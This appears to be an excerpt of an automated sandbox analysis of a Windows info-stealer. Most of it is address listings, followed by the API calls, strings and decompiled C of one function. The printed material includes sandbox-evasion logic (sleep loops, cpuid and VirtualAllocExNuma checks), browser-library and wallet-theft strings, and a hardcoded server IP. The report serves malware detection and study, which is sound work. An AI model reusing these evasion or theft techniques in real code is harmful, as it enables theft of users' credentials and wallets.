                                                                                0x0040b70a
                                                                                0x0040b70f
                                                                                0x0040b716
                                                                                0x0040b716
                                                                                0x0040b71c
                                                                                0x0040b721
                                                                                0x0040b721
                                                                                0x0040b726
                                                                                0x0040b72b
                                                                                0x0040b72f
                                                                                0x0040b734
                                                                                0x0040b737
                                                                                0x0040b739
                                                                                0x0040b741
                                                                                0x0040b745
                                                                                0x0040b74a
                                                                                0x0040b752
                                                                                0x0040b757
                                                                                0x0040b75c
                                                                                0x0040b766
                                                                                0x0040b768
                                                                                0x0040b768
                                                                                0x0040b770
                                                                                0x0040b776
                                                                                0x0040b778
                                                                                0x0040b77a
                                                                                0x0040b77d
                                                                                0x0040b77f
                                                                                0x0040b784
                                                                                0x0040b789
                                                                                0x0040b78e
                                                                                0x0040b78e
                                                                                0x0040b798
                                                                                0x0040b79d
                                                                                0x0040b79f
                                                                                0x0040b79f
                                                                                0x0040b7a7
                                                                                0x0040b7ad
                                                                                0x0040b7af
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b7b5
                                                                                0x0040b7ba
                                                                                0x0040b7bf
                                                                                0x0040b7c3
                                                                                0x0040b7c8
                                                                                0x0040b7cb
                                                                                0x0040b7cd
                                                                                0x0040b7d5
                                                                                0x0040b7d9
                                                                                0x0040b7de
                                                                                0x0040b7e6
                                                                                0x0040b7eb
                                                                                0x0040b7f0
                                                                                0x0040b7fa
                                                                                0x0040b7fc
                                                                                0x0040b7fc
                                                                                0x0040b804
                                                                                0x0040b80a
                                                                                0x0040b80c
                                                                                0x0040b80e
                                                                                0x0040b811
                                                                                0x0040b813
                                                                                0x0040b818
                                                                                0x0040b81d
                                                                                0x0040b822
                                                                                0x0040b822
                                                                                0x0040b82c
                                                                                0x0040b831
                                                                                0x0040b833
                                                                                0x0040b833
                                                                                0x0040b83b
                                                                                0x0040b841
                                                                                0x0040b843
                                                                                0x00000000
                                                                                0x0040b845
                                                                                0x0040b84a
                                                                                0x00000000
                                                                                0x0040b84a
                                                                                0x0040b843
                                                                                0x0040b855
                                                                                0x0040b857
                                                                                0x0040b85d
                                                                                0x0040b864
                                                                                0x0040b86d
                                                                                0x0040b871
                                                                                0x0040b87d
                                                                                0x0040b885
                                                                                0x0040b894
                                                                                0x0040b89c
                                                                                0x0040b8a1
                                                                                0x0040b8ae
                                                                                0x0040b8b6
                                                                                0x0040b8bd
                                                                                0x0040b8c5
                                                                                0x0040b8d4
                                                                                0x0040b8dc
                                                                                0x0040b8e1
                                                                                0x0040b8e8
                                                                                0x0040b8ed
                                                                                0x0040b8ef
                                                                                0x0040b8ef
                                                                                0x0040b8f3
                                                                                0x0040b8f9
                                                                                0x0040b900
                                                                                0x0040b905
                                                                                0x0040b907
                                                                                0x0040b907
                                                                                0x0040b90d
                                                                                0x0040b91a
                                                                                0x0040b91f
                                                                                0x0040b925
                                                                                0x0040b92a
                                                                                0x0040b930
                                                                                0x0040b932
                                                                                0x0040b932
                                                                                0x0040b936
                                                                                0x0040b946
                                                                                0x0040b952
                                                                                0x0040b958
                                                                                0x0040b966
                                                                                0x0040b96e
                                                                                0x0040b973
                                                                                0x0040b976
                                                                                0x0040b97e
                                                                                0x0040b982
                                                                                0x0040b984
                                                                                0x0040b984
                                                                                0x0040b986
                                                                                0x0040b98d
                                                                                0x0040b993
                                                                                0x0040b995
                                                                                0x0040b995
                                                                                0x0040b99a
                                                                                0x0040b99b
                                                                                0x0040b9a0
                                                                                0x0040b9a5
                                                                                0x0040b9aa
                                                                                0x0040b9af
                                                                                0x0040b9c1
                                                                                0x0040b9d0
                                                                                0x0040b9d8
                                                                                0x0040b9e7
                                                                                0x0040b9f2
                                                                                0x0040b9f9
                                                                                0x0040b9fd
                                                                                0x0040ba09
                                                                                0x0040ba0e
                                                                                0x0040ba14
                                                                                0x0040ba1c
                                                                                0x0040ba2b
                                                                                0x0040ba33
                                                                                0x0040ba3f
                                                                                0x0040ba40
                                                                                0x0040ba57
                                                                                0x0040ba6d
                                                                                0x0040ba75
                                                                                0x0040ba7a
                                                                                0x0040ba7d
                                                                                0x0040ba85
                                                                                0x0040ba89
                                                                                0x0040ba8b
                                                                                0x0040ba8b
                                                                                0x0040ba8f
                                                                                0x0040baa2
                                                                                0x0040baa6
                                                                                0x0040bab4
                                                                                0x0040bac2
                                                                                0x0040bad0
                                                                                0x0040bad8
                                                                                0x0040badd
                                                                                0x0040bae1
                                                                                0x0040baf2
                                                                                0x0040baf7
                                                                                0x0040bafc
                                                                                0x0040baff
                                                                                0x0040bb0a
                                                                                0x0040bb0f
                                                                                0x0040bb17
                                                                                0x0040bb1b
                                                                                0x0040bb22
                                                                                0x0040bb2a
                                                                                0x0040bb2e
                                                                                0x0040bb30
                                                                                0x0040bb30
                                                                                0x0040bb3a
                                                                                0x0040bb49
                                                                                0x0040bb51
                                                                                0x0040bb5d
                                                                                0x0040bb62
                                                                                0x0040bb6a
                                                                                0x0040bb71
                                                                                0x0040bb79
                                                                                0x0040bb7d
                                                                                0x0040bb7f
                                                                                0x0040bb7f
                                                                                0x0040bb89
                                                                                0x0040bb98
                                                                                0x0040bba0
                                                                                0x0040bbac
                                                                                0x0040bbb1
                                                                                0x0040bbb9
                                                                                0x0040bbc0
                                                                                0x0040bbc8
                                                                                0x0040bbcc
                                                                                0x0040bbce
                                                                                0x0040bbce
                                                                                0x0040bbd8
                                                                                0x0040bbe7
                                                                                0x0040bbef
                                                                                0x0040bbfb
                                                                                0x0040bc00
                                                                                0x0040bc08
                                                                                0x0040bc0f
                                                                                0x0040bc17
                                                                                0x0040bc1b
                                                                                0x0040bc1d
                                                                                0x0040bc1d
                                                                                0x0040bc27
                                                                                0x0040bc36
                                                                                0x0040bc3e
                                                                                0x0040bc4a
                                                                                0x0040bc4f
                                                                                0x0040bc57
                                                                                0x0040bc5e
                                                                                0x0040bc66
                                                                                0x0040bc6a
                                                                                0x0040bc6c
                                                                                0x0040bc6c
                                                                                0x0040bc76
                                                                                0x0040bc85
                                                                                0x0040bc8d
                                                                                0x0040bc99
                                                                                0x0040bc9e
                                                                                0x0040bca6
                                                                                0x0040bcad
                                                                                0x0040bcb5
                                                                                0x0040bcb9
                                                                                0x0040bcbb
                                                                                0x0040bcbb
                                                                                0x0040bcc5
                                                                                0x0040bcd4
                                                                                0x0040bcdc
                                                                                0x0040bce1
                                                                                0x0040bcee
                                                                                0x0040bcf4
                                                                                0x0040bcf9
                                                                                0x0040bcff
                                                                                0x0040bd01
                                                                                0x0040bd01
                                                                                0x0040bd03
                                                                                0x0040bd0b
                                                                                0x0040bd17
                                                                                0x0040bd1c
                                                                                0x0040bd29
                                                                                0x0040bd2a
                                                                                0x0040bd2f
                                                                                0x0040bd35
                                                                                0x0040bd37
                                                                                0x0040bd37
                                                                                0x0040bd3b
                                                                                0x0040bd47
                                                                                0x0040bd4c
                                                                                0x0040bd59
                                                                                0x0040bd5a
                                                                                0x0040bd5f
                                                                                0x0040bd65
                                                                                0x0040bd67
                                                                                0x0040bd67
                                                                                0x0040bd6b
                                                                                0x0040bd77
                                                                                0x0040bd7c
                                                                                0x0040bd89
                                                                                0x0040bd8a
                                                                                0x0040bd8f
                                                                                0x0040bd95
                                                                                0x0040bd97
                                                                                0x0040bd97
                                                                                0x0040bd9b
                                                                                0x0040bda7
                                                                                0x0040bdac
                                                                                0x0040bdb9
                                                                                0x0040bdba
                                                                                0x0040bdbf
                                                                                0x0040bdc5
                                                                                0x0040bdc7
                                                                                0x0040bdc7
                                                                                0x0040bdcb
                                                                                0x0040bdd7
                                                                                0x0040bddc
                                                                                0x0040bde9
                                                                                0x0040bdea
                                                                                0x0040bdef
                                                                                0x0040bdf5
                                                                                0x0040bdf7
                                                                                0x0040bdf7
                                                                                0x0040bdfb
                                                                                0x0040be07
                                                                                0x0040be0c
                                                                                0x0040be19
                                                                                0x0040be1a
                                                                                0x0040be1f
                                                                                0x0040be25
                                                                                0x0040be27
                                                                                0x0040be27
                                                                                0x0040be2a
                                                                                0x0040be3a
                                                                                0x0040be49
                                                                                0x0040be4e
                                                                                0x0040be59
                                                                                0x0040be60
                                                                                0x0040be67
                                                                                0x0040be6f
                                                                                0x0040be74
                                                                                0x0040be7b
                                                                                0x0040be80
                                                                                0x0040be87
                                                                                0x0040be8c
                                                                                0x0040be93
                                                                                0x0040be98
                                                                                0x0040be9f
                                                                                0x0040bea6
                                                                                0x0040beb8
                                                                                0x0040bec0
                                                                                0x0040beca
                                                                                0x0040becf
                                                                                0x0040bee6
                                                                                0x0040beec
                                                                                0x0040bef3
                                                                                0x0040bef8
                                                                                0x0040befc
                                                                                0x0040befe
                                                                                0x0040befe
                                                                                0x0040bf01
                                                                                0x0040bf11
                                                                                0x0040bf16
                                                                                0x0040bf1b
                                                                                0x0040bf1f
                                                                                0x0040bf25
                                                                                0x0040bf2a
                                                                                0x0040bf30
                                                                                0x0040bf36
                                                                                0x0040bf43
                                                                                0x0040bf44
                                                                                0x0040bf49
                                                                                0x0040bf4f
                                                                                0x0040bf51
                                                                                0x0040bf51
                                                                                0x0040bf55
                                                                                0x0040bf65
                                                                                0x0040bf6a
                                                                                0x0040bf77
                                                                                0x0040bf78
                                                                                0x0040bf7d
                                                                                0x0040bf83
                                                                                0x0040bf85
                                                                                0x0040bf85
                                                                                0x0040bf88
                                                                                0x0040bf98
                                                                                0x0040bf9d
                                                                                0x0040bfa4
                                                                                0x0040bfa9
                                                                                0x0040bfab
                                                                                0x0040bfab
                                                                                0x0040bfb1
                                                                                0x0040bfb6
                                                                                0x0040bfbe
                                                                                0x0040bfc3
                                                                                0x0040bfc4
                                                                                0x0040bfc9
                                                                                0x0040bfcf
                                                                                0x0040bfd1
                                                                                0x0040bfd1
                                                                                0x0040bfd4
                                                                                0x0040bfe4
                                                                                0x0040bfe9
                                                                                0x0040bfef
                                                                                0x0040bff1
                                                                                0x0040bff6
                                                                                0x0040bffa
                                                                                0x0040bfff
                                                                                0x0040c000
                                                                                0x0040c005
                                                                                0x0040c013
                                                                                0x0040c01f
                                                                                0x0040c024
                                                                                0x0040c025
                                                                                0x0040c02a
                                                                                0x0040c02d
                                                                                0x0040c02f
                                                                                0x0040c039
                                                                                0x0040c03d
                                                                                0x0040c042
                                                                                0x0040c047
                                                                                0x0040c04d
                                                                                0x0040c054
                                                                                0x0040c05c
                                                                                0x0040c05c
                                                                                0x0040c061
                                                                                0x0040c067
                                                                                0x0040c069
                                                                                0x0040c069
                                                                                0x0040c06e
                                                                                0x0040c075
                                                                                0x0040c07a
                                                                                0x0040c07c
                                                                                0x0040c07c
                                                                                0x0040c07f
                                                                                0x0040c085
                                                                                0x0040c08a
                                                                                0x0040c08b
                                                                                0x0040c08e
                                                                                0x0040c090
                                                                                0x0040c094
                                                                                0x0040c09b
                                                                                0x0040c0a3
                                                                                0x0040c0a5
                                                                                0x0040c0b1
                                                                                0x0040c0b6
                                                                                0x0040c0b7
                                                                                0x0040c0bf
                                                                                0x0040c0c6
                                                                                0x0040c0ce
                                                                                0x0040c0d6
                                                                                0x0040c0db
                                                                                0x0040c0e3
                                                                                0x0040c0e7
                                                                                0x0040c0e9
                                                                                0x0040c0e9
                                                                                0x0040c0eb
                                                                                0x0040c0f0
                                                                                0x0040c0f1
                                                                                0x0040c0f5
                                                                                0x0040c0fd
                                                                                0x0040c102
                                                                                0x0040c107
                                                                                0x0040c110
                                                                                0x0040c11f
                                                                                0x0040c127
                                                                                0x0040c12c
                                                                                0x0040c130
                                                                                0x0040c142
                                                                                0x0040c146
                                                                                0x0040c149
                                                                                0x0040c15b
                                                                                0x0040c15e
                                                                                0x0040c161
                                                                                0x0040c165
                                                                                0x0040c165
                                                                                0x0040c16d
                                                                                0x0040c170
                                                                                0x0040c178
                                                                                0x0040c17f
                                                                                0x0040c17f
                                                                                0x0040c184
                                                                                0x0040c188
                                                                                0x0040c14b
                                                                                0x0040c14b
                                                                                0x0040c14f
                                                                                0x0040c14f
                                                                                0x0040c132
                                                                                0x0040c132
                                                                                0x0040c136
                                                                                0x0040c136
                                                                                0x0040c18d
                                                                                0x0040c191
                                                                                0x0040c195
                                                                                0x0040c197
                                                                                0x0040c1f0
                                                                                0x0040c1f5
                                                                                0x0040c1fe
                                                                                0x0040c207
                                                                                0x0040c20f
                                                                                0x0040c215
                                                                                0x0040c219
                                                                                0x0040c21f
                                                                                0x0040c275
                                                                                0x0040c279
                                                                                0x0040c27f
                                                                                0x0040c283
                                                                                0x0040c285
                                                                                0x0040c29a
                                                                                0x0040c29a
                                                                                0x0040c29f
                                                                                0x0040c2a4
                                                                                0x0040c2aa
                                                                                0x0040c2b1
                                                                                0x0040c2b6
                                                                                0x0040c2b8
                                                                                0x0040c2b8
                                                                                0x0040c2bd
                                                                                0x0040c2c6
                                                                                0x0040c2ca
                                                                                0x0040c2d8
                                                                                0x0040c2dc
                                                                                0x0040c2e4
                                                                                0x0040c2e9
                                                                                0x0040c2ed
                                                                                0x0040c2f1
                                                                                0x0040c2f7
                                                                                0x0040c308
                                                                                0x0040c316
                                                                                0x0040c324
                                                                                0x0040c332
                                                                                0x0040c33e
                                                                                0x0040c346
                                                                                0x0040c347
                                                                                0x0040c348
                                                                                0x0040c350
                                                                                0x0040c35a
                                                                                0x0040c35a
                                                                                0x0040c28d
                                                                                0x0040c28f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c292
                                                                                0x00000000
                                                                                0x0040c297
                                                                                0x0040c223
                                                                                0x0040c224
                                                                                0x0040c224
                                                                                0x0040c22d
                                                                                0x0040c22f
                                                                                0x0040c23f
                                                                                0x0040c23f
                                                                                0x0040c244
                                                                                0x0040c244
                                                                                0x0040c24e
                                                                                0x0040c258
                                                                                0x00000000
                                                                                0x0040c258
                                                                                0x0040c246
                                                                                0x0040c246
                                                                                0x0040c248
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c24a
                                                                                0x0040c24c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c24c
                                                                                0x0040c231
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c235
                                                                                0x0040c235
                                                                                0x0040c237
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c239
                                                                                0x00000000
                                                                                0x0040c25e
                                                                                0x0040c263
                                                                                0x0040c269
                                                                                0x0040c26d
                                                                                0x0040c26d
                                                                                0x00000000
                                                                                0x0040c199
                                                                                0x0040c1aa
                                                                                0x0040c1b0
                                                                                0x0040c1b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c1c0
                                                                                0x0040c1c6
                                                                                0x0040c1ca
                                                                                0x0040c1cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c1ce
                                                                                0x0040c1d2
                                                                                0x0040c1d4
                                                                                0x0040c1d6
                                                                                0x0040c1de
                                                                                0x0040c1ea
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c1d8
                                                                                0x0040c1d8
                                                                                0x0040c1d8
                                                                                0x0040c1da
                                                                                0x0040c1db
                                                                                0x0040c1db
                                                                                0x0040c1db
                                                                                0x00000000
                                                                                0x0040c1d8

                                                                                APIs
                                                                                  • Part of subcall function 00419473: LoadLibraryA.KERNEL32(?,?,?,?,?,?,4124C941), ref: 00419481
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000), ref: 0041949E
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000), ref: 004194AC
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,CreateThread), ref: 004194C7
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004194D8
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004194E9
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 004194FA
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetSystemInfo), ref: 0041950B
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,WideCharToMultiByte), ref: 0041951C
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0041952D
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,HeapAlloc), ref: 0041953E
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetProcessHeap), ref: 0041954F
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00419560
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00419571
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00419582
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00419593
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004195A4
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,lstrlenA), ref: 004195B5
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004195C6
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,lstrcpyA), ref: 004195D7
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,MultiByteToWideChar), ref: 004195E8
                                                                                  • Part of subcall function 00419473: GetProcAddress.KERNEL32(00000000,lstrcatA), ref: 004195F9
                                                                                  • Part of subcall function 00415610: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,4124C941), ref: 0041561E
                                                                                  • Part of subcall function 00415BB2: GetUserNameA.ADVAPI32(?,?), ref: 00415BE0
                                                                                  • Part of subcall function 0041551F: __EH_prolog3.LIBCMT ref: 0041553E
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040B6FA
                                                                                • GetLastError.KERNEL32 ref: 0040B704
                                                                                • Sleep.KERNEL32(00007530), ref: 0040B716
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B770
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B7A7
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B804
                                                                                • StrCmpCA.SHLWAPI(312E3439,ERROR), ref: 0040B83B
                                                                                • Sleep.KERNEL32(0001D4C0), ref: 0040B84A
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 0040D47C: __EH_prolog3.LIBCMT ref: 0040D483
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 0040B8F3
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000), ref: 0040B90D
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040B936
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040BD0B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BD3B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BD6B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BD9B
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BDCB
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BDFB
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 0040BE2A
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,0044858C,?,?,00000001,00000000,0044858C,00000001,00000000), ref: 0040BF01
                                                                                  • Part of subcall function 0040ABD6: __EH_prolog3_GS.LIBCMT ref: 0040ABE0
                                                                                  • Part of subcall function 0040ABD6: GetProcessHeap.KERNEL32(00000000,000F423F,00000270,0040BF24,?,00000001,00000000), ref: 0040ABF6
                                                                                  • Part of subcall function 0040ABD6: HeapAlloc.KERNEL32(00000000), ref: 0040ABFD
                                                                                  • Part of subcall function 0040ABD6: __time64.LIBCMT ref: 0040AC12
                                                                                  • Part of subcall function 0040ABD6: __localtime64_s.LIBCMT ref: 0040AC26
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,Version: ), ref: 0040AC46
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00000000), ref: 0040AC61
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00440ED8), ref: 0040AC7E
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,Date: ), ref: 0040AC8A
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,?), ref: 0040AC95
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,MachineID: ), ref: 0040ACA1
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00000000), ref: 0040ACBC
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,GUID: ), ref: 0040ACD7
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,00000000), ref: 0040ACF6
                                                                                  • Part of subcall function 0040ABD6: lstrcat.KERNEL32(00000000,HWID: ), ref: 0040AD11
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0040BF55
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 0040BF88
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000001,00000000), ref: 0040BFD4
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,00000001,00000000), ref: 0040C07F
                                                                                • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,?), ref: 0040C1AA
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C1B9
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040C1C0
                                                                                • CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,?), ref: 0040C1EA
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040AAB2,?,00000000,00000000), ref: 0040C20F
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040AAB2,?,00000000,00000000), ref: 0040C258
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040C263
                                                                                • CloseHandle.KERNEL32(?), ref: 0040C279
                                                                                • SetCurrentDirectoryA.KERNEL32(C:\ProgramData), ref: 0040C2A4
                                                                                • SHFileOperation.SHELL32(?), ref: 0040C2F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Directory$Create$lstrcat$Current$Heap$H_prolog3Sleep$AllocBinaryCryptProcessStringThread_memmove$CloseErrorFileH_prolog3_HandleInfoLastLibraryLoadMutexNameOperationSystemUser__localtime64_s__time64
                                                                                • String ID: $!$"$#$%$(C$(C$*.*$.zip$94.130.174.62$C:\ProgramData$ERROR$\files$\files\$\files\Wallets$\freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$freebl3.dll$http://$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$sqlite3.dll$vcruntime140.dll
                                                                                • API String ID: 2725794071-3608671108
                                                                                • Opcode ID: d3d26d4c8b558181d7554e1ba9c54bca0f5ba82da3f13b18b682730cef3efd24
                                                                                • Instruction ID: 10509071814e3c3b4c26833c59f8d18b50ec90d40b73f461b6d3ba6d587295fb
                                                                                • Opcode Fuzzy Hash: d3d26d4c8b558181d7554e1ba9c54bca0f5ba82da3f13b18b682730cef3efd24
                                                                                • Instruction Fuzzy Hash: 8072A3B14093809FE734EB65D945B9B7BA8EB85304F00083EF589A71D2DB789944CB6F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 88%
                                                                                			E0040C3FE(intOrPtr __ebx, intOrPtr __edx, void* __fp0) {
                                                                                				signed int _v8;
                                                                                				struct _SYSTEMTIME _v24;
                                                                                				intOrPtr* _v28;
                                                                                				signed int _v36;
                                                                                				char _v40;
                                                                                				signed int _v44;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t17;
                                                                                				signed char _t26;
                                                                                				void* _t28;
                                                                                				intOrPtr _t40;
                                                                                				void* _t41;
                                                                                				intOrPtr _t45;
                                                                                				struct HINSTANCE__* _t46;
                                                                                				char* _t47;
                                                                                				long _t49;
                                                                                				intOrPtr* _t50;
                                                                                				long _t51;
                                                                                				signed int _t53;
                                                                                				void* _t58;
                                                                                
                                                                                				_t58 = __fp0;
                                                                                				_t45 = __edx;
                                                                                				_t40 = __ebx;
                                                                                				_t17 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t17 ^ _t53;
                                                                                				_t46 = LoadLibraryA("kernel32.dll");
                                                                                				_t54 = _t46;
                                                                                				if(_t46 != 0) {
                                                                                					 *0x44a038 = GetProcAddress(_t46, "Sleep");
                                                                                					 *0x44a048 = GetProcAddress(_t46, "GetSystemTime");
                                                                                				}
                                                                                				_t49 = 0x10;
                                                                                				Sleep(_t49); // executed
                                                                                				Sleep(_t49); // executed
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				E0040C372(_t45, _t46, _t54);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				E0040C372(_t45, _t46, _t54);
                                                                                				Sleep(_t49);
                                                                                				Sleep(_t49);
                                                                                				_v44 = _v44 | 0xffffffff;
                                                                                				_t47 =  &_v40;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				_v28 =  &_v44;
                                                                                				_t50 = _v28;
                                                                                				asm("cpuid");
                                                                                				 *_t50 = 1;
                                                                                				 *((intOrPtr*)(_t50 + 4)) = _t40;
                                                                                				 *((intOrPtr*)(_t50 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t50 + 0xc)) = _t45;
                                                                                				_t41 = _t40;
                                                                                				_t26 = _v36 >> 0x1f;
                                                                                				_t51 = 0x10;
                                                                                				_t55 = _t26 & 0x00000001;
                                                                                				if((_t26 & 0x00000001) != 0) {
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                					GetSystemTime( &_v24);
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                					E0041F58A(_v24.wMilliseconds & 0x0000ffff);
                                                                                					_pop(0);
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                					E0041F59C(_t55);
                                                                                					Sleep(_t51);
                                                                                					Sleep(_t51);
                                                                                				}
                                                                                				E0040C372(_t45, _t47, _t55);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				_t28 = GetCurrentProcess();
                                                                                				__imp__VirtualAllocExNuma(_t28, 0, 0x7d0, 0x3000, 0x40, 0); // executed
                                                                                				_t56 = _t28;
                                                                                				if(_t28 == 0) {
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				E00401102(0);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				E0040104C(0);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51);
                                                                                				Sleep(_t51); // executed
                                                                                				E0040B5AD(0, _t45, _t56, _t58); // executed
                                                                                				return E0041DEB4(0, _t41, _v8 ^ _t53, _t45, 0, _t51);
                                                                                			}
























                                                                                0x0040c3fe
                                                                                0x0040c3fe
                                                                                0x0040c3fe
                                                                                0x0040c404
                                                                                0x0040c40b
                                                                                0x0040c41b
                                                                                0x0040c41d
                                                                                0x0040c41f
                                                                                0x0040c435
                                                                                0x0040c43c
                                                                                0x0040c43c
                                                                                0x0040c444
                                                                                0x0040c446
                                                                                0x0040c44d
                                                                                0x0040c454
                                                                                0x0040c45b
                                                                                0x0040c462
                                                                                0x0040c469
                                                                                0x0040c46f
                                                                                0x0040c475
                                                                                0x0040c47c
                                                                                0x0040c483
                                                                                0x0040c48a
                                                                                0x0040c491
                                                                                0x0040c498
                                                                                0x0040c49f
                                                                                0x0040c4a6
                                                                                0x0040c4ad
                                                                                0x0040c4b4
                                                                                0x0040c4bb
                                                                                0x0040c4c2
                                                                                0x0040c4c9
                                                                                0x0040c4d0
                                                                                0x0040c4d7
                                                                                0x0040c4de
